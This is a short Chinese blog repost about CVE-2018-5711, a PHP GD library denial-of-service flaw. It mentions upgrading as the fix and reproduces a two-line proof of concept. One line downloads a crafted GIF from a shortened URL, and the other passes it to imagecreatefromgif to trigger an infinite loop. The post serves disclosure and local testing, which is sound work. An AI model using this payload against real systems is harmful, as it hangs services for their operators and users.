您的位置:首页 > 编程语言 > PHP开发

CVE-2018-5711:PHP GD库拒绝服务漏洞

2018-02-08 10:20 966 查看


阿里云发布的PHP高危漏洞

这肯定要修补啊,官方解决方案就是升级到最新版

升级过程就不说了
编译----安装
期间各种BUG,很恶心

事后,觉得这漏洞还挺好,就给大家转载下
有时间的可以自己测试下
不要捣蛋哦,小朋友们

PoC

下载捣蛋文件
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif

本机函数测试
$ php -r 'imagecreatefromgif("poc.gif");'

结果自循环,请使用ctrl+c
Infinite loop here...
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息